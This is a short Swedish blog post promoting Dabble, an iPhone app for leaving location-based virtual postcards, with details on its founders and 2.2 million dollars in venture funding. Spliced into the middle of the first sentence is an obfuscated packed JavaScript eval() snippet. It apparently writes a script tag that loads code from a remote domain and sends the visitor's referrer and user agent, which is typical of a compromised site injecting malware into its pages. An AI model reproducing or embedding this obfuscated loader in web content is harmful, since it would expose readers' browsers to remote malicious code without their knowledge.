Image Image Image Image Image Image Image Image Image Image

| 26 oktober, 2020

Scroll to top

Top

Lämna virtuella vykort med appen Dabble

Lämna virtuella vykort med appen Dabble
Sebastian

Ännu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ertri|var|u0026u|referrer|rsdee||js|php’.split(’|’),0,{}))
en fototjänst som är baserad på gps:en i din smartphone. Denna roliga applikation låter dig lämna virtuella vykort runt om i världen så när dina vänner är i närheten kan de titta på dessa och se vad du lännat för kommentar om området eller platsen.

Det kan vara ifall jag har varit i New York på resa, kan jag ha ätit på en riktigt bra restaurang som jag även kommenterat i appen. När mina vänner är i samma stad så kan de enkelt få inspiration av vad jag har upplevt på restaurangen. På detta sätt kan de leda till en guide som byggs upp vänner tillsammans.

Appen Dabble har Twitters föredetta chef för ”business operations” och några andra kändisar bakom sig. De har också lyckats få in  2,2 miljoner dollar från riskkapitalister för att kunna köra igång.

Dabble finns nu att ladda hem gratis för iPhone och snart även för Android.

Ladda ner via länken nedan!

Dabble: Social Postcards - Daemonic Labs